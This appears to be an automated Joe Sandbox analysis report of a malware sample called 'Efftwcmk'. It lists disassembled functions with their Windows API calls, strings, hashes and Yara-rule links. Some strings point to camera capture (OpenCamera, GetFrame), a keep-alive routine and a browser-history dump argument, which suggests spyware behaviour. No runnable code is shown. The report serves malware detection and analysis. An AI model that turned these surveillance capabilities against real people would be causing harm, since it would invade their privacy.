__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25ACEF

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: d255612dfce7b39e11ad0b6d7e08e36dbfe9ef15f2a2b53103a506f0079c1007
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: 3E812C726897069BE7189B28CC82F6A73E9EF55720F20453AE610F7280F775F94487A0

Function 2D224371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 2D2244C4

Part of subcall function 2D224607: __EH_prolog.LIBCMT ref: 2D22460C

Strings

GetFrame, xrefs: 2D22459F
OpenCamera, xrefs: 2D224582
CloseCamera, xrefs: 2D22458E
FreeFrame, xrefs: 2D2245B0
HN)-, xrefs: 2D2245E6

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HN)-$OpenCamera
API String ID: 3469354165-3159281448
Opcode ID: ddc26ea1b6ce9ac074e420903940f0595ad776bdc9e8deedb1617e0990a3b33d
Instruction ID: 016f498f84d733b09d28c7728e3ec1624635b081511e779033eec532b2fc8370
Opcode Fuzzy Hash: ddc26ea1b6ce9ac074e420903940f0595ad776bdc9e8deedb1617e0990a3b33d
Instruction Fuzzy Hash: 61514631A8CB1167C715EB348C4CA6E37A5EFB0A40F814138F64577791DF35AA06C396

Function 2D267571 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 2D267723
__freea.LIBCMT ref: 2D267741

Part of subcall function 2D255E40: _free.LIBCMT ref: 2D255E56

Strings

a/p, xrefs: 2D267808
am/pm, xrefs: 2D2677A4
z&-, xrefs: 2D2679AB

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: __freea$_free
String ID: a/p$am/pm$z&-
API String ID: 3432400110-1842569809
Opcode ID: 855aed93f1a8e68c9583a68e5e264d7ff3c126fca124a6f8f5658a6c7883bf4a
Instruction ID: ee7a1f16cd3f5856e2d50a577d91b6a5972cba989bcf1c0bc1ab75504ed4564b
Opcode Fuzzy Hash: 855aed93f1a8e68c9583a68e5e264d7ff3c126fca124a6f8f5658a6c7883bf4a
Instruction Fuzzy Hash: 5ED1CE31999307CADB168F64EC80ABAB7F1FF05740F248159DA44BBA59E27599C0CBF0

Function 02C7E504 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C7E59D
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C7E5B9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C7E5F2
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C7E66F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C7E688
VariantCopy.OLEAUT32(?,00000000), ref: 02C7E6BD

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction ID: 4eb16e0d618de1ae91261030451efc29454c5a5d4d6e00a71ffff65ee7ed8b4e
Opcode Fuzzy Hash: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction Fuzzy Hash: 2451C5B690062D9BCB62EF58CC80BD9B3BDAF8D310F4441E5E509A7211DB70AF859F61

Function 2D26A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 2D26A08F
__alldvrm.LIBCMT ref: 2D26A290
__alldvrm.LIBCMT ref: 2D26A2B2

Strings

Pk)-N)-, xrefs: 2D26A006

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: Pk)-N)-
API String ID: 1036877536-771429351
Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction ID: 777d4fffa91991157ad02a34e610e277d736058685e7cd943e88464a80e6ffb7
Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction Fuzzy Hash: 25A14871AC83869FE712CF58CC81BAABBE5FF51350F1441A9D695BB281C23999C1C7E0

Function 2D268215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,2D25F720,2D25A7F5,2D25F720,2D294EF8,Pk)-N)-,2D25CE15,FF8BC35D,2D294EF8,2D294EF8), ref: 2D268219
_free.LIBCMT ref: 2D26824C
_free.LIBCMT ref: 2D268274
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D268281
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D26828D
_abort.LIBCMT ref: 2D268293

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1ac3623901bb2595894742e469820a2686eca0e2d55b6c445ffb2f79ae32a932
Instruction ID: a91b6e1ec267ad193458f29b1d5ad47d497459523c8958023f2299212592eeef
Opcode Fuzzy Hash: 1ac3623901bb2595894742e469820a2686eca0e2d55b6c445ffb2f79ae32a932
Instruction Fuzzy Hash: F2F04E391C8B812BC20326255C08F6B6535DFD2A65F210234FA24B22C0EF2498C549F4

Function 2D262801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Pk)-N)-, xrefs: 2D262803

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID: Pk)-N)-
API String ID: 0-771429351
Opcode ID: 2d25666de7f9f87afc24e46b330590e30263787cc905a1580beb3cdc45f9e717
Instruction ID: 5f9641ba9a334b42966d43450ae604ebb08fe4b1deccec3e9a261de6fd17f1b5
Opcode Fuzzy Hash: 2d25666de7f9f87afc24e46b330590e30263787cc905a1580beb3cdc45f9e717
Instruction Fuzzy Hash: 4241D771A84304AFE3259F78CC40B9E7BA8EF84710F20853AE605FB2D0D671A98187E0

Function 2D224CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,2D294F50), ref: 2D224DB3
CreateThread.KERNEL32(00000000,00000000,?,2D294EF8,00000000,00000000), ref: 2D224DC7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224DD2
CloseHandle.KERNEL32(00000000), ref: 2D224DDB

Strings

Pk)-N)-, xrefs: 2D224CCC

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: Pk)-N)-
API String ID: 3360349984-771429351
Opcode ID: 3731ed543e87eb0ed8991613fb8c5b161e6c32015117c3082c97586c7891fb92
Instruction ID: 37639d5c407cf24a4bf1ade0411ef854cfdad7bb9d0f7e2d758266287619cce3
Opcode Fuzzy Hash: 3731ed543e87eb0ed8991613fb8c5b161e6c32015117c3082c97586c7891fb92
Instruction Fuzzy Hash: 2941C37128C7016FD715EB60CC58EBFB7EDEFA5710F00092DF592A2290DF25A909C661

Function 2D27112C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,2D25F8C8,?,00000000,?,00000001,?,000000FF,00000001,2D25F8C8,?), ref: 2D271179
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2D271202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 2D271214
__freea.LIBCMT ref: 2D27121D

Part of subcall function 2D266137: RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169

Strings

Pk)-N)-, xrefs: 2D27112E

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID: Pk)-N)-
API String ID: 2652629310-771429351
Opcode ID: 7e4338b139794563491ffefb1c1842cee4794e77519c5026d7fe5f5b57f17318
Instruction ID: d77f1414ea1b245fb5f9d026d4c05a9a777cc32cbb2affcbc968466b07bd309a
Opcode Fuzzy Hash: 7e4338b139794563491ffefb1c1842cee4794e77519c5026d7fe5f5b57f17318
Instruction Fuzzy Hash: 9031E371A4122A9BEF26CF65CC44EAF7BB5EF40610F014168ED04EB294E735D951CB90

Function 02C73568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C7358A
RegQueryValueExA.ADVAPI32 ref: 02C735BD
RegCloseKey.ADVAPI32(?), ref: 02C735D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02C73580
FPUMaskValue, xrefs: 02C735B4

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 963985fd024f13be878af30f4f155e415d33284cf1acebd2991f3a30fcdae973
Instruction ID: 6ecff730b15fa39bc5630043eaa6f363b546635efb732c54c31982037b297aeb
Opcode Fuzzy Hash: 963985fd024f13be878af30f4f155e415d33284cf1acebd2991f3a30fcdae973
Instruction Fuzzy Hash: 9001D475A44388BAFB11DB90CD42FBD77ECEB08B10F1005B2BA05D7580E6799A10EB99

Function 2D2250E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,2D294EF8), ref: 2D225120
SetEvent.KERNEL32(?), ref: 2D22512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 2D225137
CloseHandle.KERNEL32(?), ref: 2D225140

Part of subcall function 2D23B4EF: GetLocalTime.KERNEL32(00000000), ref: 2D23B509

Strings

KeepAlive | Disabled, xrefs: 2D2250F9

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: df0c238d50e27f948690f9a3fabd17e80df68b2cd90144650d5b89d5213c5cbf
Instruction ID: 858b8b53a59757767a886abc75e5a0cf4742c677ef6415ee55d6bfc17f9ccae1
Opcode Fuzzy Hash: df0c238d50e27f948690f9a3fabd17e80df68b2cd90144650d5b89d5213c5cbf
Instruction Fuzzy Hash: 0BF024718487407FEB203B74CD0EB3B7EADFB27610F008418F982B23A2D5259400CB66

Function 2D269365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2D27F234), ref: 2D2693CF
WideCharToMultiByte.KERNEL32(00000000,00000000,2D292764,000000FF,00000000,0000003F,00000000,?,?), ref: 2D269447
WideCharToMultiByte.KERNEL32(00000000,00000000,2D2927B8,000000FF,?,0000003F,00000000,?), ref: 2D269474
_free.LIBCMT ref: 2D2693BD

Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA

_free.LIBCMT ref: 2D269589

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 301291800e0fc99d1ff697af4bf9892c97dcd2dd3e15aa9b6bffd6707f9cf908
Instruction ID: 0e34946e01ccb9b1c923cf1df991ea685b3c551216961ae139cbde7e0bceaca9
Opcode Fuzzy Hash: 301291800e0fc99d1ff697af4bf9892c97dcd2dd3e15aa9b6bffd6707f9cf908
Instruction Fuzzy Hash: A151D571844319ABCB04DF64CC84DEAB7BCEF45754F61426AE614B7280EB349A81CBF0

Function 2D263DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 2D263E6B
_free.LIBCMT ref: 2D263E8B

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 032306b1845e31982509cd438bd85712ccf142e7277b703f9f2819ceb958c650
Instruction ID: 827873319260457950771b5a21ea176f234e72af95b8ab5f5e4117877812333a
Opcode Fuzzy Hash: 032306b1845e31982509cd438bd85712ccf142e7277b703f9f2819ceb958c650
Instruction Fuzzy Hash: 6D41A136A403149BCB14CF78CD80A5EB3B5EF84714F1641A9D665FB281DA31A941CBE0

Function 2D268299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,2D25BC87,00000000,?,?,2D25BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 2D26829E
_free.LIBCMT ref: 2D2682D3
_free.LIBCMT ref: 2D2682FA
SetLastError.KERNEL32(00000000), ref: 2D268307
SetLastError.KERNEL32(00000000), ref: 2D268310

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0f5a6d0496854c2063c440b964f419d060518067265996dd0b6562475fc66dcd
Instruction ID: 66c24f8da70169a4794d794a6cd7d242c6b71b590254d0aea3c9d2659e6fa432
Opcode Fuzzy Hash: 0f5a6d0496854c2063c440b964f419d060518067265996dd0b6562475fc66dcd
Instruction Fuzzy Hash: A001D63A5C87816693131A254C88E6B6529EFD2AB5F214139FA14B23C1FF64C9C149F8

Function 02C7A9C8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02C7AA5F,?,?,00000000), ref: 02C7A9E0

Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C7AA5F,?,?,00000000), ref: 02C7AA10
EnumCalendarInfoA.KERNEL32(Function_0000A914,00000000,00000000,00000004), ref: 02C7AA1B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C7AA5F,?,?,00000000), ref: 02C7AA39
EnumCalendarInfoA.KERNEL32(Function_0000A950,00000000,00000000,00000003), ref: 02C7AA44

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: ba2f50d62c52073ad5bc5edca6965858a6220d43feb42ed5991bed68531c15c1
Instruction ID: 5a5e7e71c8b117a6fcb2510d07186e84a611d36a923532124f983d466e5ebefd
Opcode Fuzzy Hash: ba2f50d62c52073ad5bc5edca6965858a6220d43feb42ed5991bed68531c15c1
Instruction Fuzzy Hash: F701F2712806446FF701A6748D12F6E736DDB46B30FA10170F500A66D0E6349F00ABA4

Function 2D2709BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 2D2709D4

Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA

_free.LIBCMT ref: 2D2709E6
_free.LIBCMT ref: 2D2709F8
_free.LIBCMT ref: 2D270A0A
_free.LIBCMT ref: 2D270A1C

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55e90d3591cfa4bf57f5887efb58729ccfd620a962851276a59b38fd2ddb97eb
Instruction ID: 8d90e6d1675c02fa3fcc06394e5fccf4f6e3f40918503d1d1d7acb8ac5498783
Opcode Fuzzy Hash: 55e90d3591cfa4bf57f5887efb58729ccfd620a962851276a59b38fd2ddb97eb
Instruction Fuzzy Hash: 3DF04F31488211A7D621DA59EAC5D6B33F9EB64B16F7189A9E268F7600CA34FCC046A4

Function 2D26BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

Pk)-N)-, xrefs: 2D26BA39

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID: Pk)-N)-
API String ID: 0-771429351
Opcode ID: 8cfcc61ab3f6050cecf1dc8c69c2adb974dfe3aa4c4bf2a1470c7fe638315fee
Instruction ID: 8f66995de1c235c2342be705182664909ba1249cb19ac552b6d5e98c9709d72d
Opcode Fuzzy Hash: 8cfcc61ab3f6050cecf1dc8c69c2adb974dfe3aa4c4bf2a1470c7fe638315fee
Instruction Fuzzy Hash: 1251AD7199430AAECB018FA4CC44FAF7BB8FF55354F514169E900B7291EA34AA81CBF0

Function 02C7AA78 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02C7AC48,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C7AAA7

Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A

Strings

eeee, xrefs: 02C7ABB6
yyyy, xrefs: 02C7AB9D
ggg, xrefs: 02C7AB8D

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 5a6228dc98b6a3f74ca840c9bd6c000728f2ecf725eb267db893a7ad2488ae0e
Instruction ID: 63a564faf9551d3996158af098400e9a8fd818a293162d5bd164a16ce7843419
Opcode Fuzzy Hash: 5a6228dc98b6a3f74ca840c9bd6c000728f2ecf725eb267db893a7ad2488ae0e
Instruction Fuzzy Hash: B641F1703049055BD726AB79C9802BEF3FBEB85340F644626D462C7344E735DE06EA21

Function 02C8CF46 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON

Download Yara Rule

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C8D086

Strings

Initialize, xrefs: 02C8CF76
OpenSession, xrefs: 02C8D028
ScanBuffer, xrefs: 02C8CFCF

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 600ac77fe761e00c31ab13b7ee1ce0b8ef13f884fc8221810fc6cc1ba381c58e
Instruction ID: ef63f25ccf7c9f4ab1231c36a9f6c207648ba26a483a0b3744ee8f44dec70dbb
Opcode Fuzzy Hash: 600ac77fe761e00c31ab13b7ee1ce0b8ef13f884fc8221810fc6cc1ba381c58e
Instruction Fuzzy Hash: F3411075B501089FEB24FBA4D841A9EB7FAEF88314F218432E051E7290DB74AD06AF55

Function 2D26B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,Pk)-N)-,2D26BB7E,?,00000000,FF8BC35D), ref: 2D26B8D2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 2D26B900
GetLastError.KERNEL32 ref: 2D26B931

Strings

Pk)-N)-, xrefs: 2D26B821

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: Pk)-N)-
API String ID: 2456169464-771429351
Opcode ID: b6a93801bbca26ff9fcf8169cbda4a4a58fe345db948c966412ad415a54c7449
Instruction ID: 219aa4eae458b46d252900c22b7697aa2a0d7d453a05692dd542b322441a8dbf
Opcode Fuzzy Hash: b6a93801bbca26ff9fcf8169cbda4a4a58fe345db948c966412ad415a54c7449
Instruction Fuzzy Hash: 98315E75A403199FDB14CF59DC85AEAB7B8EB08704F1044B9E90AE7250DA30AE80CFA0

Function 2D22404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 2D224066

Part of subcall function 2D23B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,2D22407C), ref: 2D23B99F

Part of subcall function 2D238568: CloseHandle.KERNEL32(2D2240F5), ref: 2D23857E
Part of subcall function 2D238568: CloseHandle.KERNEL32(t^(-), ref: 2D238587

Part of subcall function 2D23C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 2D23C49E

Sleep.KERNEL32(000000FA,2D285E74), ref: 2D224138

Strings

/sort "Visit Time" /stext ", xrefs: 2D2240B2
0N)-, xrefs: 2D224097

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0N)-
API String ID: 368326130-1302915440
Opcode ID: 28ab1ec9ec5aa841c152793d42a5ce35175a756454f5c5eca92e0ea8be1af798
Instruction ID: 56efef560b573543cf3975370ca70dceafd57dba4863f82dc61f06ca78b28d28
Opcode Fuzzy Hash: 28ab1ec9ec5aa841c152793d42a5ce35175a756454f5c5eca92e0ea8be1af798
Instruction Fuzzy Hash: 3D31663198862857CB15EBB4DCD9EEE7375EFB1200F410079F616B7194EF206E4ACA91

